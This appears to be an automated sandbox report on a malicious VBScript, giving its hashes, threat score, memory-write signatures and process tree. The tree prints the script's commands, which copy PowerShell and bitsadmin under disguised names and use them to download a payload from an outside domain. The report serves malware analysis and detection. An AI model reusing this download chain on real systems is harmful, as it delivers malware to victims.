79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c | Triage

Analysis

max time kernel
146s
max time network
146s
platform
windows10_x64
resource
win10
submitted
30-06-2020 11:36

Sharing

Report Analysis Logs

General

Target

FattDiffEmessa2020 03799870369.vbs
Size

3KB
MD5

ba1697038db097aae963962a1fd5dd15
SHA1

46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
SHA256

79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
SHA512

d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64

Score

8^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 3676 wrote to memory of 3236	3676	WScript.exe	cmd.exe
PID 3676 wrote to memory of 3236	3676	WScript.exe	cmd.exe
PID 3676 wrote to memory of 3812	3676	WScript.exe	cmd.exe
PID 3676 wrote to memory of 3812	3676	WScript.exe	cmd.exe
PID 3676 wrote to memory of 3804	3676	WScript.exe	DrBqNtd.exe
PID 3676 wrote to memory of 3804	3676	WScript.exe	DrBqNtd.exe
PID 3676 wrote to memory of 3804	3676	WScript.exe	DrBqNtd.exe

Executes dropped EXE 1 IoCs

Processes:

DrBqNtd.exe

pid process

3804 DrBqNtd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe
2⤵
PID:3236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
2⤵
PID:3812

C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
"C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
2⤵
- Executes dropped EXE
PID:3804

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

Download Submit
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

Download Submit
memory/3236-0-0x0000000000000000-mapping.dmp

Download
memory/3804-3-0x0000000000000000-mapping.dmp

Download
memory/3812-1-0x0000000000000000-mapping.dmp

Download